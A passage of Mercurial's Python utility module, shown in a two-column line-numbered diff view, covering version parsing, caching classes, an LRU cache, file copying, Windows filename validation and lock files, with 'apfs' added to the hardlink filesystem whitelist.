1003 1003 >>> v = b'3.6.1+190-df9b73d2d444'
1004 1004 >>> versiontuple(v, 2)
1005 1005 (3, 6)
1006 1006 >>> versiontuple(v, 3)
1007 1007 (3, 6, 1)
1008 1008 >>> versiontuple(v, 4)
1009 1009 (3, 6, 1, '190-df9b73d2d444')
1010 1010
1011 1011 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1012 1012 (3, 6, 1, '190-df9b73d2d444+20151118')
1013 1013
1014 1014 >>> v = b'3.6'
1015 1015 >>> versiontuple(v, 2)
1016 1016 (3, 6)
1017 1017 >>> versiontuple(v, 3)
1018 1018 (3, 6, None)
1019 1019 >>> versiontuple(v, 4)
1020 1020 (3, 6, None, None)
1021 1021
1022 1022 >>> v = b'3.9-rc'
1023 1023 >>> versiontuple(v, 2)
1024 1024 (3, 9)
1025 1025 >>> versiontuple(v, 3)
1026 1026 (3, 9, None)
1027 1027 >>> versiontuple(v, 4)
1028 1028 (3, 9, None, 'rc')
1029 1029
1030 1030 >>> v = b'3.9-rc+2-02a8fea4289b'
1031 1031 >>> versiontuple(v, 2)
1032 1032 (3, 9)
1033 1033 >>> versiontuple(v, 3)
1034 1034 (3, 9, None)
1035 1035 >>> versiontuple(v, 4)
1036 1036 (3, 9, None, 'rc+2-02a8fea4289b')
1037 1037 """
1038 1038 if not v:
1039 1039 v = version()
1040 1040 parts = remod.split('[\+-]', v, 1)
1041 1041 if len(parts) == 1:
1042 1042 vparts, extra = parts[0], None
1043 1043 else:
1044 1044 vparts, extra = parts
1045 1045
1046 1046 vints = []
1047 1047 for i in vparts.split('.'):
1048 1048 try:
1049 1049 vints.append(int(i))
1050 1050 except ValueError:
1051 1051 break
1052 1052 # (3, 6) -> (3, 6, None)
1053 1053 while len(vints) < 3:
1054 1054 vints.append(None)
1055 1055
1056 1056 if n == 2:
1057 1057 return (vints[0], vints[1])
1058 1058 if n == 3:
1059 1059 return (vints[0], vints[1], vints[2])
1060 1060 if n == 4:
1061 1061 return (vints[0], vints[1], vints[2], extra)
1062 1062
1063 1063 def cachefunc(func):
1064 1064 '''cache the result of function calls'''
1065 1065 # XXX doesn't handle keywords args
1066 1066 if func.__code__.co_argcount == 0:
1067 1067 cache = []
1068 1068 def f():
1069 1069 if len(cache) == 0:
1070 1070 cache.append(func())
1071 1071 return cache[0]
1072 1072 return f
1073 1073 cache = {}
1074 1074 if func.__code__.co_argcount == 1:
1075 1075 # we gain a small amount of time because
1076 1076 # we don't need to pack/unpack the list
1077 1077 def f(arg):
1078 1078 if arg not in cache:
1079 1079 cache[arg] = func(arg)
1080 1080 return cache[arg]
1081 1081 else:
1082 1082 def f(*args):
1083 1083 if args not in cache:
1084 1084 cache[args] = func(*args)
1085 1085 return cache[args]
1086 1086
1087 1087 return f
1088 1088
1089 1089 class cow(object):
1090 1090 """helper class to make copy-on-write easier
1091 1091
1092 1092 Call preparewrite before doing any writes.
1093 1093 """
1094 1094
1095 1095 def preparewrite(self):
1096 1096 """call this before writes, return self or a copied new object"""
1097 1097 if getattr(self, '_copied', 0):
1098 1098 self._copied -= 1
1099 1099 return self.__class__(self)
1100 1100 return self
1101 1101
1102 1102 def copy(self):
1103 1103 """always do a cheap copy"""
1104 1104 self._copied = getattr(self, '_copied', 0) + 1
1105 1105 return self
1106 1106
1107 1107 class sortdict(collections.OrderedDict):
1108 1108 '''a simple sorted dictionary
1109 1109
1110 1110 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1111 1111 >>> d2 = d1.copy()
1112 1112 >>> d2
1113 1113 sortdict([('a', 0), ('b', 1)])
1114 1114 >>> d2.update([(b'a', 2)])
1115 1115 >>> list(d2.keys()) # should still be in last-set order
1116 1116 ['b', 'a']
1117 1117 '''
1118 1118
1119 1119 def __setitem__(self, key, value):
1120 1120 if key in self:
1121 1121 del self[key]
1122 1122 super(sortdict, self).__setitem__(key, value)
1123 1123
1124 1124 if pycompat.ispypy:
1125 1125 # __setitem__() isn't called as of PyPy 5.8.0
1126 1126 def update(self, src):
1127 1127 if isinstance(src, dict):
1128 1128 src = src.iteritems()
1129 1129 for k, v in src:
1130 1130 self[k] = v
1131 1131
1132 1132 class cowdict(cow, dict):
1133 1133 """copy-on-write dict
1134 1134
1135 1135 Be sure to call d = d.preparewrite() before writing to d.
1136 1136
1137 1137 >>> a = cowdict()
1138 1138 >>> a is a.preparewrite()
1139 1139 True
1140 1140 >>> b = a.copy()
1141 1141 >>> b is a
1142 1142 True
1143 1143 >>> c = b.copy()
1144 1144 >>> c is a
1145 1145 True
1146 1146 >>> a = a.preparewrite()
1147 1147 >>> b is a
1148 1148 False
1149 1149 >>> a is a.preparewrite()
1150 1150 True
1151 1151 >>> c = c.preparewrite()
1152 1152 >>> b is c
1153 1153 False
1154 1154 >>> b is b.preparewrite()
1155 1155 True
1156 1156 """
1157 1157
1158 1158 class cowsortdict(cow, sortdict):
1159 1159 """copy-on-write sortdict
1160 1160
1161 1161 Be sure to call d = d.preparewrite() before writing to d.
1162 1162 """
1163 1163
1164 1164 class transactional(object):
1165 1165 """Base class for making a transactional type into a context manager."""
1166 1166 __metaclass__ = abc.ABCMeta
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def close(self):
1170 1170 """Successfully closes the transaction."""
1171 1171
1172 1172 @abc.abstractmethod
1173 1173 def release(self):
1174 1174 """Marks the end of the transaction.
1175 1175
1176 1176 If the transaction has not been closed, it will be aborted.
1177 1177 """
1178 1178
1179 1179 def __enter__(self):
1180 1180 return self
1181 1181
1182 1182 def __exit__(self, exc_type, exc_val, exc_tb):
1183 1183 try:
1184 1184 if exc_type is None:
1185 1185 self.close()
1186 1186 finally:
1187 1187 self.release()
1188 1188
1189 1189 @contextlib.contextmanager
1190 1190 def acceptintervention(tr=None):
1191 1191 """A context manager that closes the transaction on InterventionRequired
1192 1192
1193 1193 If no transaction was provided, this simply runs the body and returns
1194 1194 """
1195 1195 if not tr:
1196 1196 yield
1197 1197 return
1198 1198 try:
1199 1199 yield
1200 1200 tr.close()
1201 1201 except error.InterventionRequired:
1202 1202 tr.close()
1203 1203 raise
1204 1204 finally:
1205 1205 tr.release()
1206 1206
1207 1207 @contextlib.contextmanager
1208 1208 def nullcontextmanager():
1209 1209 yield
1210 1210
1211 1211 class _lrucachenode(object):
1212 1212 """A node in a doubly linked list.
1213 1213
1214 1214 Holds a reference to nodes on either side as well as a key-value
1215 1215 pair for the dictionary entry.
1216 1216 """
1217 1217 __slots__ = (u'next', u'prev', u'key', u'value')
1218 1218
1219 1219 def __init__(self):
1220 1220 self.next = None
1221 1221 self.prev = None
1222 1222
1223 1223 self.key = _notset
1224 1224 self.value = None
1225 1225
1226 1226 def markempty(self):
1227 1227 """Mark the node as emptied."""
1228 1228 self.key = _notset
1229 1229
1230 1230 class lrucachedict(object):
1231 1231 """Dict that caches most recent accesses and sets.
1232 1232
1233 1233 The dict consists of an actual backing dict - indexed by original
1234 1234 key - and a doubly linked circular list defining the order of entries in
1235 1235 the cache.
1236 1236
1237 1237 The head node is the newest entry in the cache. If the cache is full,
1238 1238 we recycle head.prev and make it the new head. Cache accesses result in
1239 1239 the node being moved to before the existing head and being marked as the
1240 1240 new head node.
1241 1241 """
1242 1242 def __init__(self, max):
1243 1243 self._cache = {}
1244 1244
1245 1245 self._head = head = _lrucachenode()
1246 1246 head.prev = head
1247 1247 head.next = head
1248 1248 self._size = 1
1249 1249 self._capacity = max
1250 1250
1251 1251 def __len__(self):
1252 1252 return len(self._cache)
1253 1253
1254 1254 def __contains__(self, k):
1255 1255 return k in self._cache
1256 1256
1257 1257 def __iter__(self):
1258 1258 # We don't have to iterate in cache order, but why not.
1259 1259 n = self._head
1260 1260 for i in range(len(self._cache)):
1261 1261 yield n.key
1262 1262 n = n.next
1263 1263
1264 1264 def __getitem__(self, k):
1265 1265 node = self._cache[k]
1266 1266 self._movetohead(node)
1267 1267 return node.value
1268 1268
1269 1269 def __setitem__(self, k, v):
1270 1270 node = self._cache.get(k)
1271 1271 # Replace existing value and mark as newest.
1272 1272 if node is not None:
1273 1273 node.value = v
1274 1274 self._movetohead(node)
1275 1275 return
1276 1276
1277 1277 if self._size < self._capacity:
1278 1278 node = self._addcapacity()
1279 1279 else:
1280 1280 # Grab the last/oldest item.
1281 1281 node = self._head.prev
1282 1282
1283 1283 # At capacity. Kill the old entry.
1284 1284 if node.key is not _notset:
1285 1285 del self._cache[node.key]
1286 1286
1287 1287 node.key = k
1288 1288 node.value = v
1289 1289 self._cache[k] = node
1290 1290 # And mark it as newest entry. No need to adjust order since it
1291 1291 # is already self._head.prev.
1292 1292 self._head = node
1293 1293
1294 1294 def __delitem__(self, k):
1295 1295 node = self._cache.pop(k)
1296 1296 node.markempty()
1297 1297
1298 1298 # Temporarily mark as newest item before re-adjusting head to make
1299 1299 # this node the oldest item.
1300 1300 self._movetohead(node)
1301 1301 self._head = node.next
1302 1302
1303 1303 # Additional dict methods.
1304 1304
1305 1305 def get(self, k, default=None):
1306 1306 try:
1307 1307 return self._cache[k].value
1308 1308 except KeyError:
1309 1309 return default
1310 1310
1311 1311 def clear(self):
1312 1312 n = self._head
1313 1313 while n.key is not _notset:
1314 1314 n.markempty()
1315 1315 n = n.next
1316 1316
1317 1317 self._cache.clear()
1318 1318
1319 1319 def copy(self):
1320 1320 result = lrucachedict(self._capacity)
1321 1321 n = self._head.prev
1322 1322 # Iterate in oldest-to-newest order, so the copy has the right ordering
1323 1323 for i in range(len(self._cache)):
1324 1324 result[n.key] = n.value
1325 1325 n = n.prev
1326 1326 return result
1327 1327
1328 1328 def _movetohead(self, node):
1329 1329 """Mark a node as the newest, making it the new head.
1330 1330
1331 1331 When a node is accessed, it becomes the freshest entry in the LRU
1332 1332 list, which is denoted by self._head.
1333 1333
1334 1334 Visually, let's make ``N`` the new head node (* denotes head):
1335 1335
1336 1336 previous/oldest <-> head <-> next/next newest
1337 1337
1338 1338 ----<->--- A* ---<->-----
1339 1339 | |
1340 1340 E <-> D <-> N <-> C <-> B
1341 1341
1342 1342 To:
1343 1343
1344 1344 ----<->--- N* ---<->-----
1345 1345 | |
1346 1346 E <-> D <-> C <-> B <-> A
1347 1347
1348 1348 This requires the following moves:
1349 1349
1350 1350 C.next = D (node.prev.next = node.next)
1351 1351 D.prev = C (node.next.prev = node.prev)
1352 1352 E.next = N (head.prev.next = node)
1353 1353 N.prev = E (node.prev = head.prev)
1354 1354 N.next = A (node.next = head)
1355 1355 A.prev = N (head.prev = node)
1356 1356 """
1357 1357 head = self._head
1358 1358 # C.next = D
1359 1359 node.prev.next = node.next
1360 1360 # D.prev = C
1361 1361 node.next.prev = node.prev
1362 1362 # N.prev = E
1363 1363 node.prev = head.prev
1364 1364 # N.next = A
1365 1365 # It is tempting to do just "head" here, however if node is
1366 1366 # adjacent to head, this will do bad things.
1367 1367 node.next = head.prev.next
1368 1368 # E.next = N
1369 1369 node.next.prev = node
1370 1370 # A.prev = N
1371 1371 node.prev.next = node
1372 1372
1373 1373 self._head = node
1374 1374
1375 1375 def _addcapacity(self):
1376 1376 """Add a node to the circular linked list.
1377 1377
1378 1378 The new node is inserted before the head node.
1379 1379 """
1380 1380 head = self._head
1381 1381 node = _lrucachenode()
1382 1382 head.prev.next = node
1383 1383 node.prev = head.prev
1384 1384 node.next = head
1385 1385 head.prev = node
1386 1386 self._size += 1
1387 1387 return node
1388 1388
1389 1389 def lrucachefunc(func):
1390 1390 '''cache most recent results of function calls'''
1391 1391 cache = {}
1392 1392 order = collections.deque()
1393 1393 if func.__code__.co_argcount == 1:
1394 1394 def f(arg):
1395 1395 if arg not in cache:
1396 1396 if len(cache) > 20:
1397 1397 del cache[order.popleft()]
1398 1398 cache[arg] = func(arg)
1399 1399 else:
1400 1400 order.remove(arg)
1401 1401 order.append(arg)
1402 1402 return cache[arg]
1403 1403 else:
1404 1404 def f(*args):
1405 1405 if args not in cache:
1406 1406 if len(cache) > 20:
1407 1407 del cache[order.popleft()]
1408 1408 cache[args] = func(*args)
1409 1409 else:
1410 1410 order.remove(args)
1411 1411 order.append(args)
1412 1412 return cache[args]
1413 1413
1414 1414 return f
1415 1415
1416 1416 class propertycache(object):
1417 1417 def __init__(self, func):
1418 1418 self.func = func
1419 1419 self.name = func.__name__
1420 1420 def __get__(self, obj, type=None):
1421 1421 result = self.func(obj)
1422 1422 self.cachevalue(obj, result)
1423 1423 return result
1424 1424
1425 1425 def cachevalue(self, obj, value):
1426 1426 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1427 1427 obj.__dict__[self.name] = value
1428 1428
1429 1429 def clearcachedproperty(obj, prop):
1430 1430 '''clear a cached property value, if one has been set'''
1431 1431 if prop in obj.__dict__:
1432 1432 del obj.__dict__[prop]
1433 1433
1434 1434 def increasingchunks(source, min=1024, max=65536):
1435 1435 '''return no less than min bytes per chunk while data remains,
1436 1436 doubling min after each chunk until it reaches max'''
1437 1437 def log2(x):
1438 1438 if not x:
1439 1439 return 0
1440 1440 i = 0
1441 1441 while x:
1442 1442 x >>= 1
1443 1443 i += 1
1444 1444 return i - 1
1445 1445
1446 1446 buf = []
1447 1447 blen = 0
1448 1448 for chunk in source:
1449 1449 buf.append(chunk)
1450 1450 blen += len(chunk)
1451 1451 if blen >= min:
1452 1452 if min < max:
1453 1453 min = min << 1
1454 1454 nmin = 1 << log2(blen)
1455 1455 if nmin > min:
1456 1456 min = nmin
1457 1457 if min > max:
1458 1458 min = max
1459 1459 yield ''.join(buf)
1460 1460 blen = 0
1461 1461 buf = []
1462 1462 if buf:
1463 1463 yield ''.join(buf)
1464 1464
1465 1465 def always(fn):
1466 1466 return True
1467 1467
1468 1468 def never(fn):
1469 1469 return False
1470 1470
1471 1471 def nogc(func):
1472 1472 """disable garbage collector
1473 1473
1474 1474 Python's garbage collector triggers a GC each time a certain number of
1475 1475 container objects (the number being defined by gc.get_threshold()) are
1476 1476 allocated even when marked not to be tracked by the collector. Tracking has
1477 1477 no effect on when GCs are triggered, only on what objects the GC looks
1478 1478 into. As a workaround, disable GC while building complex (huge)
1479 1479 containers.
1480 1480
1481 1481 This garbage collector issue have been fixed in 2.7. But it still affect
1482 1482 CPython's performance.
1483 1483 """
1484 1484 def wrapper(*args, **kwargs):
1485 1485 gcenabled = gc.isenabled()
1486 1486 gc.disable()
1487 1487 try:
1488 1488 return func(*args, **kwargs)
1489 1489 finally:
1490 1490 if gcenabled:
1491 1491 gc.enable()
1492 1492 return wrapper
1493 1493
1494 1494 if pycompat.ispypy:
1495 1495 # PyPy runs slower with gc disabled
1496 1496 nogc = lambda x: x
1497 1497
1498 1498 def pathto(root, n1, n2):
1499 1499 '''return the relative path from one place to another.
1500 1500 root should use os.sep to separate directories
1501 1501 n1 should use os.sep to separate directories
1502 1502 n2 should use "/" to separate directories
1503 1503 returns an os.sep-separated path.
1504 1504
1505 1505 If n1 is a relative path, it's assumed it's
1506 1506 relative to root.
1507 1507 n2 should always be relative to root.
1508 1508 '''
1509 1509 if not n1:
1510 1510 return localpath(n2)
1511 1511 if os.path.isabs(n1):
1512 1512 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1513 1513 return os.path.join(root, localpath(n2))
1514 1514 n2 = '/'.join((pconvert(root), n2))
1515 1515 a, b = splitpath(n1), n2.split('/')
1516 1516 a.reverse()
1517 1517 b.reverse()
1518 1518 while a and b and a[-1] == b[-1]:
1519 1519 a.pop()
1520 1520 b.pop()
1521 1521 b.reverse()
1522 1522 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1523 1523
1524 1524 # the location of data files matching the source code
1525 1525 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1526 1526 # executable version (py2exe) doesn't support __file__
1527 1527 datapath = os.path.dirname(pycompat.sysexecutable)
1528 1528 else:
1529 1529 datapath = os.path.dirname(pycompat.fsencode(__file__))
1530 1530
1531 1531 i18n.setdatapath(datapath)
1532 1532
1533 1533 def checksignature(func):
1534 1534 '''wrap a function with code to check for calling errors'''
1535 1535 def check(*args, **kwargs):
1536 1536 try:
1537 1537 return func(*args, **kwargs)
1538 1538 except TypeError:
1539 1539 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1540 1540 raise error.SignatureError
1541 1541 raise
1542 1542
1543 1543 return check
1544 1544
1545 1545 # a whilelist of known filesystems where hardlink works reliably
1546 1546 _hardlinkfswhitelist = {
1547 'apfs',
1547 1548 'btrfs',
1548 1549 'ext2',
1549 1550 'ext3',
1550 1551 'ext4',
1551 1552 'hfs',
1552 1553 'jfs',
1553 1554 'NTFS',
1554 1555 'reiserfs',
1555 1556 'tmpfs',
1556 1557 'ufs',
1557 1558 'xfs',
1558 1559 'zfs',
1559 1560 }
1560 1561
1561 1562 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1562 1563 '''copy a file, preserving mode and optionally other stat info like
1563 1564 atime/mtime
1564 1565
1565 1566 checkambig argument is used with filestat, and is useful only if
1566 1567 destination file is guarded by any lock (e.g. repo.lock or
1567 1568 repo.wlock).
1568 1569
1569 1570 copystat and checkambig should be exclusive.
1570 1571 '''
1571 1572 assert not (copystat and checkambig)
1572 1573 oldstat = None
1573 1574 if os.path.lexists(dest):
1574 1575 if checkambig:
1575 1576 oldstat = checkambig and filestat.frompath(dest)
1576 1577 unlink(dest)
1577 1578 if hardlink:
1578 1579 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1579 1580 # unless we are confident that dest is on a whitelisted filesystem.
1580 1581 try:
1581 1582 fstype = getfstype(os.path.dirname(dest))
1582 1583 except OSError:
1583 1584 fstype = None
1584 1585 if fstype not in _hardlinkfswhitelist:
1585 1586 hardlink = False
1586 1587 if hardlink:
1587 1588 try:
1588 1589 oslink(src, dest)
1589 1590 return
1590 1591 except (IOError, OSError):
1591 1592 pass # fall back to normal copy
1592 1593 if os.path.islink(src):
1593 1594 os.symlink(os.readlink(src), dest)
1594 1595 # copytime is ignored for symlinks, but in general copytime isn't needed
1595 1596 # for them anyway
1596 1597 else:
1597 1598 try:
1598 1599 shutil.copyfile(src, dest)
1599 1600 if copystat:
1600 1601 # copystat also copies mode
1601 1602 shutil.copystat(src, dest)
1602 1603 else:
1603 1604 shutil.copymode(src, dest)
1604 1605 if oldstat and oldstat.stat:
1605 1606 newstat = filestat.frompath(dest)
1606 1607 if newstat.isambig(oldstat):
1607 1608 # stat of copied file is ambiguous to original one
1608 1609 advanced = (
1609 1610 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1610 1611 os.utime(dest, (advanced, advanced))
1611 1612 except shutil.Error as inst:
1612 1613 raise error.Abort(str(inst))
1613 1614
1614 1615 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1615 1616 """Copy a directory tree using hardlinks if possible."""
1616 1617 num = 0
1617 1618
1618 1619 gettopic = lambda: hardlink and _('linking') or _('copying')
1619 1620
1620 1621 if os.path.isdir(src):
1621 1622 if hardlink is None:
1622 1623 hardlink = (os.stat(src).st_dev ==
1623 1624 os.stat(os.path.dirname(dst)).st_dev)
1624 1625 topic = gettopic()
1625 1626 os.mkdir(dst)
1626 1627 for name, kind in listdir(src):
1627 1628 srcname = os.path.join(src, name)
1628 1629 dstname = os.path.join(dst, name)
1629 1630 def nprog(t, pos):
1630 1631 if pos is not None:
1631 1632 return progress(t, pos + num)
1632 1633 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1633 1634 num += n
1634 1635 else:
1635 1636 if hardlink is None:
1636 1637 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1637 1638 os.stat(os.path.dirname(dst)).st_dev)
1638 1639 topic = gettopic()
1639 1640
1640 1641 if hardlink:
1641 1642 try:
1642 1643 oslink(src, dst)
1643 1644 except (IOError, OSError):
1644 1645 hardlink = False
1645 1646 shutil.copy(src, dst)
1646 1647 else:
1647 1648 shutil.copy(src, dst)
1648 1649 num += 1
1649 1650 progress(topic, num)
1650 1651 progress(topic, None)
1651 1652
1652 1653 return hardlink, num
1653 1654
1654 1655 _winreservednames = {
1655 1656 'con', 'prn', 'aux', 'nul',
1656 1657 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1657 1658 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1658 1659 }
1659 1660 _winreservedchars = ':*?"<>|'
1660 1661 def checkwinfilename(path):
1661 1662 r'''Check that the base-relative path is a valid filename on Windows.
1662 1663 Returns None if the path is ok, or a UI string describing the problem.
1663 1664
1664 1665 >>> checkwinfilename(b"just/a/normal/path")
1665 1666 >>> checkwinfilename(b"foo/bar/con.xml")
1666 1667 "filename contains 'con', which is reserved on Windows"
1667 1668 >>> checkwinfilename(b"foo/con.xml/bar")
1668 1669 "filename contains 'con', which is reserved on Windows"
1669 1670 >>> checkwinfilename(b"foo/bar/xml.con")
1670 1671 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1671 1672 "filename contains 'AUX', which is reserved on Windows"
1672 1673 >>> checkwinfilename(b"foo/bar/bla:.txt")
1673 1674 "filename contains ':', which is reserved on Windows"
1674 1675 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1675 1676 "filename contains '\\x07', which is invalid on Windows"
1676 1677 >>> checkwinfilename(b"foo/bar/bla ")
1677 1678 "filename ends with ' ', which is not allowed on Windows"
1678 1679 >>> checkwinfilename(b"../bar")
1679 1680 >>> checkwinfilename(b"foo\\")
1680 1681 "filename ends with '\\', which is invalid on Windows"
1681 1682 >>> checkwinfilename(b"foo\\/bar")
1682 1683 "directory name ends with '\\', which is invalid on Windows"
1683 1684 '''
1684 1685 if path.endswith('\\'):
1685 1686 return _("filename ends with '\\', which is invalid on Windows")
1686 1687 if '\\/' in path:
1687 1688 return _("directory name ends with '\\', which is invalid on Windows")
1688 1689 for n in path.replace('\\', '/').split('/'):
1689 1690 if not n:
1690 1691 continue
1691 1692 for c in _filenamebytestr(n):
1692 1693 if c in _winreservedchars:
1693 1694 return _("filename contains '%s', which is reserved "
1694 1695 "on Windows") % c
1695 1696 if ord(c) <= 31:
1696 1697 return _("filename contains '%s', which is invalid "
1697 1698 "on Windows") % stringutil.escapestr(c)
1698 1699 base = n.split('.')[0]
1699 1700 if base and base.lower() in _winreservednames:
1700 1701 return _("filename contains '%s', which is reserved "
1701 1702 "on Windows") % base
1702 1703 t = n[-1:]
1703 1704 if t in '. ' and n not in '..':
1704 1705 return _("filename ends with '%s', which is not allowed "
1705 1706 "on Windows") % t
1706 1707
1707 1708 if pycompat.iswindows:
1708 1709 checkosfilename = checkwinfilename
1709 1710 timer = time.clock
1710 1711 else:
1711 1712 checkosfilename = platform.checkosfilename
1712 1713 timer = time.time
1713 1714
1714 1715 if safehasattr(time, "perf_counter"):
1715 1716 timer = time.perf_counter
1716 1717
1717 1718 def makelock(info, pathname):
1718 1719 """Create a lock file atomically if possible
1719 1720
1720 1721 This may leave a stale lock file if symlink isn't supported and signal
1721 1722 interrupt is enabled.
1722 1723 """
1723 1724 try:
1724 1725 return os.symlink(info, pathname)
1725 1726 except OSError as why:
1726 1727 if why.errno == errno.EEXIST:
1727 1728 raise
1728 1729 except AttributeError: # no symlink in os
1729 1730 pass
1730 1731
1731 1732 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1732 1733 ld = os.open(pathname, flags)
1733 1734 os.write(ld, info)
1734 1735 os.close(ld)
1735 1736
1736 1737 def readlock(pathname):
1737 1738 try:
1738 1739 return os.readlink(pathname)
1739 1740 except OSError as why:
1740 1741 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1741 1742 raise
1742 1743 except AttributeError: # no symlink in os
1743 1744 pass
1744 1745 fp = posixfile(pathname, 'rb')
1745 1746 r = fp.read()
1746 1747 fp.close()
1747 1748 return r
1748 1749
1749 1750 def fstat(fp):
1750 1751 '''stat file object that may not have fileno method.'''
1751 1752 try:
1752 1753 return os.fstat(fp.fileno())
1753 1754 except AttributeError:
1754 1755 return os.stat(fp.name)
1755 1756
1756 1757 # File system features
1757 1758
1758 1759 def fscasesensitive(path):
1759 1760 """
1760 1761 Return true if the given path is on a case-sensitive filesystem
1761 1762
1762 1763 Requires a path (like /foo/.hg) ending with a foldable final
1763 1764 directory component.
1764 1765 """
1765 1766 s1 = os.lstat(path)
1766 1767 d, b = os.path.split(path)
1767 1768 b2 = b.upper()
1768 1769 if b == b2:
1769 1770 b2 = b.lower()
1770 1771 if b == b2:
1771 1772 return True # no evidence against case sensitivity
1772 1773 p2 = os.path.join(d, b2)
1773 1774 try:
1774 1775 s2 = os.lstat(p2)
1775 1776 if s2 == s1:
1776 1777 return False
1777 1778 return True
1778 1779 except OSError:
1779 1780 return True
1780 1781
1781 1782 try:
1782 1783 import re2
1783 1784 _re2 = None
1784 1785 except ImportError:
1785 1786 _re2 = False
1786 1787
1787 1788 class _re(object):
1788 1789 def _checkre2(self):
1789 1790 global _re2
1790 1791 try:
1791 1792 # check if match works, see issue3964
1792 1793 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1793 1794 except ImportError:
1794 1795 _re2 = False
1795 1796
1796 1797 def compile(self, pat, flags=0):
1797 1798 '''Compile a regular expression, using re2 if possible
1798 1799
1799 1800 For best performance, use only re2-compatible regexp features. The
1800 1801 only flags from the re module that are re2-compatible are
1801 1802 IGNORECASE and MULTILINE.'''
1802 1803 if _re2 is None:
1803 1804 self._checkre2()
1804 1805 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1805 1806 if flags & remod.IGNORECASE:
1806 1807 pat = '(?i)' + pat
1807 1808 if flags & remod.MULTILINE:
1808 1809 pat = '(?m)' + pat
1809 1810 try:
1810 1811 return re2.compile(pat)
1811 1812 except re2.error:
1812 1813 pass
1813 1814 return remod.compile(pat, flags)
1814 1815
1815 1816 @propertycache
1816 1817 def escape(self):
1817 1818 '''Return the version of escape corresponding to self.compile.
1818 1819
1819 1820 This is imperfect because whether re2 or re is used for a particular
1820 1821 function depends on the flags, etc, but it's the best we can do.
1821 1822 '''
1822 1823 global _re2
1823 1824 if _re2 is None:
1824 1825 self._checkre2()
1825 1826 if _re2:
1826 1827 return re2.escape
1827 1828 else:
1828 1829 return remod.escape
1829 1830
1830 1831 re = _re()
1831 1832
1832 1833 _fspathcache = {}
1833 1834 def fspath(name, root):
1834 1835 '''Get name in the case stored in the filesystem
1835 1836
1836 1837 The name should be relative to root, and be normcase-ed for efficiency.
1837 1838
1838 1839 Note that this function is unnecessary, and should not be
1839 1840 called, for case-sensitive filesystems (simply because it's expensive).
1840 1841
1841 1842 The root should be normcase-ed, too.
1842 1843 '''
1843 1844 def _makefspathcacheentry(dir):
1844 1845 return dict((normcase(n), n) for n in os.listdir(dir))
1845 1846
1846 1847 seps = pycompat.ossep
1847 1848 if pycompat.osaltsep:
1848 1849 seps = seps + pycompat.osaltsep
1849 1850 # Protect backslashes. This gets silly very quickly.
1850 1851 seps.replace('\\','\\\\')
1851 1852 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1852 1853 dir = os.path.normpath(root)
1853 1854 result = []
1854 1855 for part, sep in pattern.findall(name):
1855 1856 if sep:
1856 1857 result.append(sep)
1857 1858 continue
1858 1859
1859 1860 if dir not in _fspathcache:
1860 1861 _fspathcache[dir] = _makefspathcacheentry(dir)
1861 1862 contents = _fspathcache[dir]
1862 1863
1863 1864 found = contents.get(part)
1864 1865 if not found:
1865 1866 # retry "once per directory" per "dirstate.walk" which
1866 1867 # may take place for each patches of "hg qpush", for example
1867 1868 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1868 1869 found = contents.get(part)
1869 1870
1870 1871 result.append(found or part)
1871 1872 dir = os.path.join(dir, part)
1872 1873
1873 1874 return ''.join(result)
1874 1875
1875 1876 def checknlink(testfile):
1876 1877 '''check whether hardlink count reporting works properly'''
1877 1878
1878 1879 # testfile may be open, so we need a separate file for checking to
1879 1880 # work around issue2543 (or testfile may get lost on Samba shares)
1880 1881 f1, f2, fp = None, None, None
1881 1882 try:
1882 1883 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1883 1884 suffix='1~', dir=os.path.dirname(testfile))
1884 1885 os.close(fd)
1885 1886 f2 = '%s2~' % f1[:-2]
1886 1887
1887 1888 oslink(f1, f2)
1888 1889 # nlinks() may behave differently for files on Windows shares if
1889 1890 # the file is open.
1890 1891 fp = posixfile(f2)
1891 1892 return nlinks(f2) > 1
1892 1893 except OSError:
1893 1894 return False
1894 1895 finally:
1895 1896 if fp is not None:
1896 1897 fp.close()
1897 1898 for f in (f1, f2):
1898 1899 try:
1899 1900 if f is not None:
1900 1901 os.unlink(f)
1901 1902 except OSError:
1902 1903 pass
1903 1904
1904 1905 def endswithsep(path):
1905 1906 '''Check path ends with os.sep or os.altsep.'''
1906 1907 return (path.endswith(pycompat.ossep)
1907 1908 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1908 1909
1909 1910 def splitpath(path):
1910 1911 '''Split path by os.sep.
1911 1912 Note that this function does not use os.altsep because this is
1912 1913 an alternative of simple "xxx.split(os.sep)".
1913 1914 It is recommended to use os.path.normpath() before using this
1914 1915 function if need.'''
1915 1916 return path.split(pycompat.ossep)
1916 1917
1917 1918 def mktempcopy(name, emptyok=False, createmode=None):
1918 1919 """Create a temporary file with the same contents from name
1919 1920
1920 1921 The permission bits are copied from the original file.
1921 1922
1922 1923 If the temporary file is going to be truncated immediately, you
1923 1924 can use emptyok=True as an optimization.
1924 1925
1925 1926 Returns the name of the temporary file.
1926 1927 """
1927 1928 d, fn = os.path.split(name)
